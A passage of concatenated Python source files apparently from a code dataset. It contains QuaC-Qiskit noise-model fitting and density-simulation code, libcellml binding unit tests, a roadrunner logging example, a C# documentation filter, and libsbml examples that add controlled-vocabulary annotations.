:param circuits: a list of QuantumCircuit objects
:param simulation_result: a Qiskit Result object
:param reference_result: a Qiskit Result object
:return: a float representing the total K-S distance between distributions of all circuits
"""
total_ks_div = 0
for circuit in circuits:
simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit)))
simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator
reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit)))
reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator
total_ks_div += discrete_one_samp_ks(reference_dist, simulation_dist, 8000)[0]
return total_ks_div
def angle_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float:
"""Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of
angle distance between circuit result distributions for each circuit is computed
:param circuits: a list of QuantumCircuit objects
:param simulation_result: a Qiskit Result object
:param reference_result: a Qiskit Result object
:return: a float representing the total angle distance between distributions of all circuits
"""
total_angle_div = 0
for ind, circuit in enumerate(circuits):
simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit)))
simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator
reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit)))
reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator
total_angle_div += get_vec_angle(reference_dist, simulation_dist)
return total_angle_div
def kl_objective_function(noise_model_array: np.array, *args):
"""An objective function to be minimized based on K-L divergence
:param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array()
:param args: QuantumCircuit objects run, the simulator to run on, and the hardware results
:return: a float representing the "loss" over the set of circuits
"""
circuits, backend, reference_result = args
noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits)
simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result()
return kl_div_sum(circuits, simulation_result, reference_result)
def ks_objective_function(noise_model_array: np.array, *args):
"""An objective function to be minimized based on K-S distance
:param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array()
:param args: QuantumCircuit objects run, the simulator to run on, and the hardware results
:return: a float representing the "loss" over the set of circuits
"""
circuits, backend, reference_result = args
noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits)
simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result()
return ks_div_sum(circuits, simulation_result, reference_result)
def angle_objective_function(noise_model_array: np.array, *args):
"""An objective function to be minimized based on angle divergence
:param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array()
:param args: QuantumCircuit objects run, the simulator to run on, and the hardware results
:return: a float representing the "loss" over the set of circuits
"""
circuits, backend, reference_result = args
noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits)
simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result()
return angle_div_sum(circuits, simulation_result, reference_result)
```
#### File: quac_qiskit/simulators/quac_density_simulator.py
```python
import time
import numpy as np
from scipy import sparse
from collections import defaultdict
from qiskit.result import Result
from qiskit.qobj.qasm_qobj import QasmQobj
from qiskit.providers.models.backendproperties import BackendProperties
from quac_qiskit.simulators import QuacSimulator
class QuacDensitySimulator(QuacSimulator):
"""Class for simulating a Qiskit-defined quantum experiment and computing the diagonal of its
density matrix
"""
def name(self) -> str:
"""Returns a name for identifying this specific density backend
:return: a string used to identify this backend
"""
return self.configuration().backend_name + "_density_simulator"
def properties(self) -> BackendProperties:
"""Returns backend properties that reflect the limitations of the hardware if it is
specified or the QuaC simulator if not
:return: a Qiskit BackendProperties object
"""
return self._properties
def _run_job(self, job_id: str, qobj: QasmQobj, **run_config) -> Result:
"""Specifies how to run a quantum object job on this backend. This is the method that
changes between types of QuaC backends.
:param job_id: a uuid4 string to uniquely identify this job
:param qobj: an assembled quantum object of experiments
:param run_config: injected parameters
:return: a Qiskit Result object
"""
qobj_start = time.perf_counter()
results = list()
# Update noise model if injected
job_noise_model = self._quac_noise_model
if run_config.get("quac_noise_model"):
job_noise_model = run_config.get("quac_noise_model")
for experiment in qobj.experiments:
exp_start = time.perf_counter()
final_quac_instance, qubit_measurements = super()._run_experiment(experiment, **run_config)
# Create a frequency defaultdict for multinomial experiment tallying
frequencies = defaultdict(lambda: 0)
# Get probabilities of all states occurring and try to adjust them by measurement errors
bitstring_probs = sparse.csr_matrix(final_quac_instance.get_bitstring_probs()).transpose()
if job_noise_model.has_meas():
# If measurement error simulation is turned on, adjust probabilities accordingly
for expanded_qubit_meas_mat in job_noise_model.meas():
bitstring_probs = np.dot(expanded_qubit_meas_mat, bitstring_probs)
# Switch probability list least significant bit convention and add to dictionary
for decimal_state in range(bitstring_probs.shape[0]):
binary_state = bin(decimal_state)[2:]
state_prob = bitstring_probs.toarray()[decimal_state][0]
padded_outcome_state = list(binary_state.zfill(qobj.config.n_qubits))
classical_register = ["0"] * qobj.config.memory_slots
for qubit, outcome in enumerate(padded_outcome_state):
# Only measure specified qubits into the classical register
if qubit in qubit_measurements:
for register_slot in qubit_measurements[qubit]:
classical_register[register_slot] = outcome
classical_register.reverse() # convert to Qiskit MSB format
classical_register_hex = hex(int(''.join(classical_register), 2))
frequencies[classical_register_hex] += state_prob
results.append({
"name": experiment.header.name,
"shots": qobj.config.shots,
"data": {"counts": dict(frequencies)},
"status": "DONE",
"success": True,
"time_taken": time.perf_counter() - exp_start,
"header": experiment.header.to_dict()
})
job_result = {
"backend_name": self.name(),
"backend_version": self.configuration().backend_version,
"qobj_id": qobj.qobj_id,
"job_id": job_id,
"results": results,
"success": True,
"time_taken": time.perf_counter() - qobj_start,
"header": qobj.header.to_dict()
}
return Result.from_dict(job_result)
```
#### File: quac_qiskit/stat/util.py
```python
from typing import List, Union
import random
import numpy as np
def choose_index(prob_dist: Union[List[float], np.array]) -> int:
"""Chooses an index i from a list l with probability l[i]
:param prob_dist: a list of floating point probabilities
:type prob_dist: List[float]
:return: an integer representing the chosen index
"""
chooser = random.random()
upper_limit = 0
lower_limit = 0
for i, prob in enumerate(prob_dist):
upper_limit += prob
if lower_limit <= chooser < upper_limit:
return i
lower_limit += prob
# return -1 # TODO: update when bitstring bug is fixed
return 0
``` |
{
"source": "0u812/libcellml",
"score": 3
} |
#### File: bindings/python/test_component.py
```python
import unittest
class ComponentTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Component
# Test create/copy/destroy
x = Component()
del(x)
y = Component()
z = Component(y)
del(y, z)
def test_inheritance(self):
import libcellml
from libcellml import Component
x = Component()
self.assertIsInstance(x, libcellml.ComponentEntity)
self.assertIsInstance(x, libcellml.ImportedEntity)
self.assertIsInstance(x, libcellml.NamedEntity)
self.assertIsInstance(x, libcellml.Entity)
def test_inherited_methods(self):
from libcellml import Component
x = Component()
idx = 'test'
self.assertEqual(x.id(), '')
x.setId(idx)
self.assertEqual(x.id(), idx)
y = Component(x)
self.assertEqual(y.id(), idx)
def test_set_source(self):
from libcellml import Component, ImportSource
x = Component()
i = ImportSource()
i.setUrl('bonjour')
x.setSourceComponent(i, 'camembert')
self.assertEqual(x.importSource().url(), 'bonjour')
self.assertEqual(x.importReference(), 'camembert')
def test_math(self):
from libcellml import Component
# appendMath(const std::string &math)
x = Component()
x.appendMath('More maths')
x.appendMath(' please!')
# std::string math()
self.assertEqual(x.math(), 'More maths please!')
x = Component()
self.assertEqual(x.math(), '')
# void setMath(const std::string &math)
x.setMath('bonjour')
self.assertEqual(x.math(), 'bonjour')
x.setMath('hola')
self.assertEqual(x.math(), 'hola')
def test_add_variable(self):
from libcellml import Component, Variable
c = Component()
v = Variable()
c.addVariable(v)
def test_has_variable(self):
from libcellml import Component, Variable
# bool hasVariable(const VariablePtr &variable)
c = Component()
v = Variable()
self.assertFalse(c.hasVariable(v))
c.addVariable(v)
self.assertTrue(c.hasVariable(v))
self.assertFalse(c.hasVariable(Variable()))
del(c, v)
# bool hasVariable(const std::string &name)
c = Component()
self.assertFalse(c.hasVariable(''))
v1 = Variable()
c.addVariable(v1)
self.assertFalse(c.hasVariable('blue'))
self.assertTrue(c.hasVariable(''))
name = 'yellow'
v2 = Variable()
v2.setName(name)
c.addVariable(v2)
self.assertTrue(c.hasVariable(name))
del(c, v1, v2, name)
def test_remove_variable(self):
from libcellml import Component, Variable
# bool removeVariable(size_t index)
c = Component()
self.assertFalse(c.removeVariable(0))
self.assertFalse(c.removeVariable(-1))
self.assertFalse(c.removeVariable(1))
c.addVariable(Variable())
self.assertFalse(c.removeVariable(-1))
self.assertFalse(c.removeVariable(1))
self.assertTrue(c.removeVariable(0))
self.assertFalse(c.removeVariable(0))
del(c)
# bool removeVariable(const std::string &name)
c = Component()
self.assertFalse(c.removeVariable(''))
v1 = Variable()
c.addVariable(v1)
self.assertTrue(c.removeVariable(''))
self.assertFalse(c.removeVariable(''))
name = 'blue'
v1.setName(name)
self.assertFalse(c.removeVariable(name))
c.addVariable(v1)
self.assertTrue(c.removeVariable(name))
self.assertFalse(c.removeVariable(name))
del(c, v1, name)
# bool removeVariable(const VariablePtr &variable)
c = Component()
v1 = Variable()
v2 = Variable()
self.assertFalse(c.removeVariable(v1))
c.addVariable(v1)
self.assertFalse(c.removeVariable(v2))
self.assertTrue(c.removeVariable(v1))
self.assertFalse(c.removeVariable(v1))
def test_remove_all_variables(self):
from libcellml import Component, Variable
# void removeAllVariables()
c = Component()
v1 = Variable()
v2 = Variable()
c.addVariable(v1)
c.addVariable(v2)
self.assertTrue(c.hasVariable(v1))
self.assertTrue(c.hasVariable(v2))
c.removeAllVariables()
self.assertFalse(c.hasVariable(v1))
self.assertFalse(c.hasVariable(v2))
def test_variable(self):
from libcellml import Component, Variable
# VariablePtr variable(size_t index)
c = Component()
v = Variable()
name = 'green'
v.setName(name)
self.assertIsNone(c.variable(0))
self.assertIsNone(c.variable(1))
self.assertIsNone(c.variable(-1))
c.addVariable(v)
self.assertIsNone(c.variable(1))
self.assertIsNone(c.variable(-1))
self.assertIsNotNone(c.variable(0))
self.assertEqual(c.variable(0).name(), name)
del(c, v, name)
# VariablePtr variable(const std::string &name)
c = Component()
v = Variable()
name = 'green'
v.setName(name)
self.assertIsNone(c.variable(name))
c.addVariable(v)
self.assertIsNone(c.variable('red'))
self.assertIsNotNone(c.variable(name))
self.assertEqual(c.variable(name).name(), name)
def test_variable_count(self):
from libcellml import Component, Variable
# size_t variableCount()
c = Component()
self.assertEqual(c.variableCount(), 0)
c.addVariable(Variable())
self.assertEqual(c.variableCount(), 1)
c.addVariable(Variable())
self.assertEqual(c.variableCount(), 2)
c.removeVariable('')
self.assertEqual(c.variableCount(), 1)
c.removeVariable('')
self.assertEqual(c.variableCount(), 0)
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_imported_entity.py
```python
import unittest
class ImportedEntityTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import ImportedEntity
x = ImportedEntity()
y = ImportedEntity()
z = ImportedEntity(y)
del(x, y, z)
def test_set_import_source(self):
from libcellml import ImportedEntity, ImportSource
# void setImportSource(const ImportPtr &imp)
x = ImportedEntity()
x.setImportSource(ImportSource())
x.setImportSource(None)
def test_is_import(self):
from libcellml import ImportedEntity, ImportSource
# bool isImport()
x = ImportedEntity()
self.assertFalse(x.isImport())
x.setImportSource(ImportSource())
self.assertTrue(x.isImport())
x.setImportSource(None)
self.assertFalse(x.isImport())
def test_import_source(self):
from libcellml import ImportedEntity, ImportSource
# ImportSourcePtr importSource()
i = ImportSource()
source = 'hello'
i.setUrl(source)
x = ImportedEntity()
self.assertIsNone(x.importSource())
x.setImportSource(i)
self.assertIsNotNone(x.importSource())
self.assertEqual(x.importSource().url(), source)
def test_set_import_reference(self):
from libcellml import ImportedEntity
# void setImportReference(const std::string &reference)
r = 'yes'
x = ImportedEntity()
x.setImportReference('')
x.setImportReference(r)
x.setImportReference('')
def test_import_reference(self):
from libcellml import ImportedEntity
# std::string importReference()
r = 'yes'
x = ImportedEntity()
self.assertEqual(x.importReference(), '')
x.setImportReference(r)
self.assertEqual(x.importReference(), r)
x.setImportReference('')
self.assertEqual(x.importReference(), '')
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_import_source.py
```python
import unittest
class ImportSourceTestCase(unittest.TestCase):
def test_import_source(self):
from libcellml import ImportSource
# Test create/copy/destroy
x = ImportSource()
y = ImportSource()
z = ImportSource(y)
del(x, y, z)
def test_inheritance(self):
import libcellml
from libcellml import ImportSource
x = ImportSource()
self.assertIsInstance(x, libcellml.Entity)
def test_set_url(self):
from libcellml import ImportSource
# void setUrl(const std::string &reference)
x = ImportSource()
x.setUrl('')
x.setUrl('hello')
x.setUrl('')
def test_url(self):
from libcellml import ImportSource
# std::string url()
source = 'cheers'
x = ImportSource()
self.assertEqual(x.url(), '')
x.setUrl(source)
self.assertEqual(x.url(), source)
x.setUrl('')
self.assertEqual(x.url(), '')
def test_set_model(self):
from libcellml import ImportSource, Model
# void setModel(const ModelPtr &model);
x = ImportSource()
x.setModel(None)
x.setModel(Model())
x.setModel(None)
def test_model(self):
from libcellml import ImportSource, Model
# ModelPtr model() const;
model = Model()
model.setName('bert')
x = ImportSource()
self.assertIsNone(x.model())
x.setModel(model)
self.assertEqual(x.model().name(), model.name())
x.setModel(None)
self.assertIsNone(x.model())
def test_has_model(self):
from libcellml import ImportSource, Model
# bool hasModel() const;
x = ImportSource()
self.assertFalse(x.hasModel())
x.setModel(Model())
self.assertTrue(x.hasModel())
x.setModel(None)
self.assertFalse(x.hasModel())
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_logger.py
```python
import unittest
class LoggerTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Logger
# Test create/copy/destroy
x = Logger()
del(x)
y = Logger()
z = Logger(y)
del(y, z)
def test_add_error(self):
from libcellml import Logger, Error
# void addError(const ErrorPtr error)
x = Logger()
x.addError(Error())
def test_error_count(self):
from libcellml import Logger, Error
# size_t errorCount()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
self.assertEqual(x.errorCount(), 1)
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
def test_error(self):
from libcellml import Logger, Error
# ErrorPtr error(size_t index)
x = Logger()
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertIsNone(x.error(-1))
e = Error()
e.setKind(Error.Kind.MODEL)
x.addError(e)
self.assertIsNotNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertEqual(x.error(0).kind(), Error.Kind.MODEL)
def test_clear_errors(self):
from libcellml import Logger, Error
# void clearErrors()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
x.clearErrors()
self.assertEqual(x.errorCount(), 0)
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_model.py
```python
import unittest
class ModelTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Model
x = Model()
del(x)
y = Model()
z = Model(y)
del(y, z)
def test_inheritance(self):
import libcellml
from libcellml import Model
x = Model()
self.assertIsInstance(x, libcellml.ComponentEntity)
self.assertIsInstance(x, libcellml.NamedEntity)
self.assertIsInstance(x, libcellml.Entity)
# Test access to inherited methods
x = Model()
idx = 'test'
self.assertEqual(x.id(), '')
x.setId(idx)
self.assertEqual(x.id(), idx)
y = Model(x)
self.assertEqual(y.id(), idx)
def test_add_units(self):
from libcellml import Model, Units
# void addUnits(const UnitsPtr &units)
m = Model()
u = Units()
m.addUnits(u)
def test_remove_units(self):
from libcellml import Model, Units
# bool removeUnits(size_t index)
m = Model()
u = Units()
self.assertFalse(m.removeUnits(0))
self.assertFalse(m.removeUnits(1))
self.assertFalse(m.removeUnits(-1))
m.addUnits(u)
self.assertFalse(m.removeUnits(1))
self.assertFalse(m.removeUnits(-1))
self.assertTrue(m.removeUnits(0))
self.assertFalse(m.removeUnits(0))
del(m, u)
# bool removeUnits(const std::string &name)
name = 'bert'
m = Model()
u = Units()
u.setName(name)
self.assertFalse(m.removeUnits(name))
m.addUnits(u)
self.assertFalse(m.removeUnits('ernie'))
self.assertTrue(m.removeUnits(name))
del(m, u, name)
# bool removeUnits(const UnitsPtr &units)
m = Model()
u1 = Units()
u2 = Units()
self.assertFalse(m.removeUnits(u1))
m.addUnits(u1)
self.assertFalse(m.removeUnits(u2))
self.assertTrue(m.removeUnits(u1))
self.assertFalse(m.removeUnits(u1))
del(m, u1, u2)
def test_remove_all_units(self):
from libcellml import Model, Units
# void removeAllUnits()
m = Model()
u1 = Units()
u2 = Units()
m.addUnits(u1)
m.addUnits(u2)
m.removeAllUnits()
self.assertFalse(m.removeUnits(u1))
self.assertFalse(m.removeUnits(u2))
del(m, u1, u2)
def test_has_units(self):
from libcellml import Model, Units
# bool hasUnits(const std::string &name)
name = 'loud'
m = Model()
u = Units()
u.setName(name)
m.addUnits(u)
self.assertFalse(m.hasUnits('hi'))
self.assertTrue(m.hasUnits(name))
# bool hasUnits(const UnitsPtr &units)
self.assertTrue(m.hasUnits(u))
v = Units()
self.assertFalse(m.hasUnits(v))
def test_units(self):
from libcellml import Model, Units
# UnitsPtr units(size_t index)
name = 'naaame'
m = Model()
u = Units()
u.setName(name)
self.assertIsNone(m.units(0))
self.assertIsNone(m.units(1))
self.assertIsNone(m.units(-1))
m.addUnits(u)
self.assertIsNone(m.units(1))
self.assertIsNone(m.units(-1))
self.assertIsNotNone(m.units(0))
self.assertEqual(m.units(0).name(), name)
del(m, u, name)
# UnitsPtr units(const std::string &name)
name = 'kermit'
m = Model()
u = Units()
u.setName(name)
self.assertIsNone(m.units(name))
m.addUnits(u)
self.assertIsNotNone(m.units(name))
self.assertEqual(m.units(name).name(), name)
del(m, u, name)
def test_take_units(self):
from libcellml import Model, Units
# UnitsPtr takeUnits(size_t index)
name = 'piggy'
m = Model()
u = Units()
u.setName(name)
self.assertIsNone(m.takeUnits(0))
self.assertIsNone(m.takeUnits(-1))
self.assertIsNone(m.takeUnits(1))
m.addUnits(u)
self.assertIsNone(m.takeUnits(-1))
self.assertIsNone(m.takeUnits(1))
self.assertIsNotNone(m.takeUnits(0))
self.assertIsNone(m.takeUnits(0))
m.addUnits(Units())
m.addUnits(u)
self.assertEqual(m.takeUnits(1).name(), name)
del(m, u)
# UnitsPtr takeUnits(const std::string &name)
name = 'aloha'
m = Model()
u = Units()
u.setName(name)
self.assertIsNone(m.takeUnits(name))
m.addUnits(u)
self.assertEquals(m.takeUnits(name).name(), name)
self.assertIsNone(m.takeUnits(name))
del(m, u, name)
def test_replace_units(self):
from libcellml import Model, Units
# bool replaceUnits(size_t index, const UnitsPtr &units)
m = Model()
u1 = Units()
u1.setName('a')
m.addUnits(u1)
u2 = Units()
u2.setName('b')
self.assertTrue(m.replaceUnits(0, u2))
self.assertFalse(m.replaceUnits(1, u1))
self.assertFalse(m.replaceUnits(-1, u1))
self.assertEqual(m.units(0).name(), 'b')
del(m, u1, u2)
# bool replaceUnits(const std::string &name, const UnitsPtr &units)
m = Model()
a = Units()
a.setName('a')
m.addUnits(a)
b = Units()
b.setName('b')
self.assertFalse(m.replaceUnits('b', a))
self.assertTrue(m.replaceUnits('a', b))
self.assertTrue(m.replaceUnits('b', a))
self.assertFalse(m.replaceUnits('b', a))
del(m, a, b)
# bool replaceUnits(const UnitsPtr &oldUnits, const UnitsPtr &newUnits)
m = Model()
a = Units()
m.addUnits(a)
b = Units()
self.assertFalse(m.replaceUnits(b, a))
self.assertTrue(m.replaceUnits(a, b))
self.assertTrue(m.replaceUnits(b, a))
self.assertFalse(m.replaceUnits(b, a))
del(m, a, b)
def test_units_count(self):
from libcellml import Model, Units
# size_t unitsCount()
m = Model()
self.assertEqual(m.unitsCount(), 0)
m.addUnits(Units())
self.assertEqual(m.unitsCount(), 1)
m.addUnits(Units())
self.assertEqual(m.unitsCount(), 2)
m.removeAllUnits()
self.assertEqual(m.unitsCount(), 0)
del(m)
def test_has_unresolved_imports(self):
from libcellml import Model, Component, ImportSource
# bool hasUnresolvedImports();
m = Model()
self.assertFalse(m.hasUnresolvedImports())
c = Component()
m.addComponent(c)
self.assertFalse(m.hasUnresolvedImports())
c.setImportSource(ImportSource())
self.assertTrue(m.hasUnresolvedImports())
def test_resolve_imports(self):
from libcellml import Model
m = Model()
m.resolveImports('file.txt')
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_parser.py
```python
import unittest
class ParserTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Parser
x = Parser()
del(x)
y = Parser()
z = Parser(y)
del(y, z)
def test_inheritance(self):
import libcellml
from libcellml import Parser
x = Parser()
self.assertIsInstance(x, libcellml.Logger)
# Test access to inherited methods
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(-1))
self.assertEqual(x.errorCount(), 0)
x.addError(libcellml.Error())
self.assertEqual(x.errorCount(), 1)
def test_parse_model(self):
import libcellml
from libcellml import Parser
# ModelPtr parseModel(const std::string &input)
p = Parser()
self.assertIsInstance(p.parseModel('rubbish'), libcellml.Model)
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_validator.py
```python
import unittest
class ValidatorTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Validator
x = Validator()
del(x)
y = Validator()
z = Validator(y)
del(y, z)
def test_inheritance(self):
import libcellml
from libcellml import Validator
# Test inheritance
x = Validator()
self.assertIsInstance(x, libcellml.Logger)
# Test access to inherited methods
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(-1))
self.assertEqual(x.errorCount(), 0)
x.addError(libcellml.Error())
self.assertEqual(x.errorCount(), 1)
def test_validate_model(self):
import libcellml
from libcellml import Validator
# void validateModel(const ModelPtr &model)
v = Validator()
v.validateModel(libcellml.Model())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0u812/roadrunner",
"score": 2
} |
#### File: roadrunner/examples/logging.py
```python
import roadrunner as rr
rr.Logger.setLevel(rr.Logger.LOG_TRACE)
def log():
rr.Logger.log(rr.Logger.LOG_FATAL, "A fatal message")
rr.Logger.log(rr.Logger.LOG_CRITICAL, "A critical message")
rr.Logger.log(rr.Logger.LOG_ERROR, "An error message")
rr.Logger.log(rr.Logger.LOG_WARNING, "A warning message")
rr.Logger.log(rr.Logger.LOG_NOTICE, "A notice message")
rr.Logger.log(rr.Logger.LOG_INFORMATION, "An informational message")
rr.Logger.log(rr.Logger.LOG_DEBUG, "A debugging message.")
rr.Logger.log(rr.Logger.LOG_TRACE, "A tracing message. This is the lowest priority.")
rr.Logger.log(rr.Logger.LOG_NOTICE, "logging with default colors:")
log()
rr.Logger.setFormattingPattern("%Y-%m-%d %H:%M:%S %p: %t")
log()
rr.Logger.setProperty("traceColor", "red")
rr.Logger.setProperty("debugColor", "green")
rr.Logger.setProperty("informationColor", "blue")
rr.Logger.setProperty("noticeColor", "magenta")
rr.Logger.setProperty("warningColor", "cyan")
rr.Logger.setProperty("errorColor", "gray")
rr.Logger.setProperty("criticalColor", "white")
rr.Logger.setProperty("fatalColor", "brown")
rr.Logger.log(rr.Logger.LOG_NOTICE, "logging with new and better colors:")
log()
```
#### File: src/filters/doc-filter-csharp.py
```python
import sys, string, os.path, re
def filterForDoxygen (istream, ostream):
# We read the stream line by line, looking for our marker. The marker is
# created by src/bindings/swig/swigdoc.py; it is *not* the same marker as
# we use in Doxygen comments, but rather a separate marker used for
# communication between swigdoc.py and this (csdocfilter.py) script.
pattern = re.compile('(.+?)/\* libsbml-internal \*/(.+?)public(.+?)')
for line in istream.readlines():
match = pattern.search(line)
if match:
ostream.write(pattern.sub(r'\1\2private\3', line))
else:
ostream.write(line)
def main (args):
"""Usage: csdocfilter.py file > output
This cooks the final output of our swigdoc.py + SWIG sequence for use
with doxygen, to do additional transformations that can't be done in
swigdoc.py because they rely on having in hand the final output from
SWIG. This only acts on files whose names end in .cs.
"""
if len(args) != 2:
print main.__doc__
sys.exit(1)
istream = open(args[1], 'r')
# Only process the content if it's C#.
if re.search('.cs$', args[1]):
filterForDoxygen(istream, sys.stdout)
else:
sys.stdout.write(istream.read())
istream.close()
sys.exit(0)
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/addingEvidenceCodes_1.py
```python
import sys
import os.path
from libsbml import *
def main (args):
"""usage: addingEvidenceCodes_1 <input-filename> <output-filename>
Adds controlled vocabulary term to a reaction
"""
if len(args) != 3:
print(main.__doc__)
sys.exit(2)
d = readSBML(args[1]);
errors = d.getNumErrors();
if (errors > 0):
print("Read Error(s):\n");
d.printErrors();
print("Correct the above and re-run.\n");
else:
n = d.getModel().getNumReactions();
if (n <= 0):
print("Model has no reactions.\n Cannot add CV terms\n");
else:
r = d.getModel().getReaction(0);
# check that the reaction has a metaid
# no CVTerms will be added if there is no metaid to reference
#
if ( not r.isSetMetaId()):
r.setMetaId("metaid_0000052");
cv1 = CVTerm(BIOLOGICAL_QUALIFIER);
cv1.setBiologicalQualifierType(BQB_IS_DESCRIBED_BY);
cv1.addResource("urn:miriam:obo.eco:ECO%3A0000183");
r.addCVTerm(cv1);
cv2 = CVTerm(BIOLOGICAL_QUALIFIER);
cv2.setBiologicalQualifierType(BQB_IS);
cv2.addResource("urn:miriam:kegg.reaction:R00756");
cv2.addResource("urn:miriam:reactome:REACT_736");
r.addCVTerm(cv2);
writeSBML(d, args[2]);
return errors;
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/addingEvidenceCodes_2.py
```python
import sys
import os.path
from libsbml import *
def main (args):
"""usage: addingEvidenceCodes_2 <input-filename> <output-filename>
Adds controlled vocabulary term to a species
"""
if len(args) != 3:
print(main.__doc__)
sys.exit(2)
d = readSBML(args[1]);
errors = d.getNumErrors();
if (errors > 0):
print("Read Error(s):\n");
d.printErrors();
print("Correct the above and re-run.\n");
else:
n = d.getModel().getNumSpecies();
if (n <= 0):
print("Model has no species.\n Cannot add CV terms\n");
else:
s = d.getModel().getSpecies(0);
# check that the species has a metaid
# no CVTerms will be added if there is no metaid to reference
#
if (not s.isSetMetaId()):
s.setMetaId("metaid_0000052");
cv1 = CVTerm(BIOLOGICAL_QUALIFIER);
cv1.setBiologicalQualifierType(BQB_OCCURS_IN);
cv1.addResource("urn:miriam:obo.go:GO%3A0005764");
s.addCVTerm(cv1);
# now create the additional annotation
# <rdf:Statement>
# <rdf:subject rdf:resource="#metaid_0000052"/>
# <rdf:predicate rdf:resource="http://biomodels.net/biology-qualifiers/occursIn"/>
# <rdf:object rdf:resource="urn:miriam:obo.go:GO%3A0005764"/>
# <bqbiol:isDescribedBy>
# <rdf:Bag>
# <rdf:li rdf:resource="urn:miriam:obo.eco:ECO%3A0000004"/>
# <rdf:li rdf:resource="urn:miriam:pubmed:7017716"/>
# </rdf:Bag>
# </bqbiol:isDescribedBy>
# </rdf:Statement>
# attributes
blank_att = XMLAttributes();
resource_att = XMLAttributes();
# create the outer statement node
statement_triple = XMLTriple("Statement",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
statement_token = XMLToken(statement_triple, blank_att);
statement = XMLNode(statement_token);
# create the subject node
subject_triple = XMLTriple("subject",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
resource_att.clear();
resource_att.add("rdf:resource", "#" + s.getMetaId());
subject_token = XMLToken(subject_triple, resource_att);
subject = XMLNode(subject_token);
#create the predicate node
predicate_triple = XMLTriple("predicate",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
resource_att.clear();
resource_att.add("rdf:resource",
"http://biomodels.net/biology-qualifiers/occursIn");
predicate_token = XMLToken(predicate_triple, resource_att);
predicate = XMLNode(predicate_token);
#create the object node
object_triple = XMLTriple("object",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
resource_att.clear();
resource_att.add("rdf:resource", "urn:miriam:obo.go:GO%3A0005764");
object_token = XMLToken(object_triple, resource_att);
object_ = XMLNode(object_token);
# create the bqbiol node
bqbiol_triple = XMLTriple("isDescribedBy",
"http://biomodels.net/biology-qualifiers/",
"bqbiol");
bqbiol_token = XMLToken(bqbiol_triple, blank_att);
bqbiol = XMLNode(bqbiol_token);
# create the bag node
bag_triple = XMLTriple("Bag",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
bag_token = XMLToken(bag_triple, blank_att);
bag = XMLNode(bag_token);
# create each li node and add to the bag
li_triple = XMLTriple("li",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
resource_att.clear();
resource_att.add("rdf:resource", "urn:miriam:obo.eco:ECO%3A0000004");
li_token = XMLToken(li_triple, resource_att);
li_token.setEnd();
li = XMLNode(li_token);
bag.addChild(li);
resource_att.clear();
resource_att.add("rdf:resource", "urn:miriam:pubmed:7017716");
li_token = XMLToken(li_triple, resource_att);
li_token.setEnd();
li = XMLNode(li_token);
bag.addChild(li);
# add the bag to bqbiol
bqbiol.addChild(bag);
# add subject, predicate, object and bqbiol to statement
statement.addChild(subject);
statement.addChild(predicate);
statement.addChild(object_);
statement.addChild(bqbiol);
# create a top-level RDF element
# this will ensure correct merging
#
xmlns = XMLNamespaces();
xmlns.add("http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf");
xmlns.add("http://purl.org/dc/elements/1.1/", "dc");
xmlns.add("http://purl.org/dc/terms/", "dcterms");
xmlns.add("http://www.w3.org/2001/vcard-rdf/3.0#", "vCard");
xmlns.add("http://biomodels.net/biology-qualifiers/", "bqbiol");
xmlns.add("http://biomodels.net/model-qualifiers/", "bqmodel");
RDF_triple = XMLTriple("RDF",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
RDF_token = XMLToken(RDF_triple, blank_att, xmlns);
annotation = XMLNode(RDF_token);
# add the staement node to the RDF node
annotation.addChild(statement);
s.appendAnnotation(annotation);
writeSBML(d, args[2]);
return errors;
if __name__ == '__main__':
main(sys.argv)
```
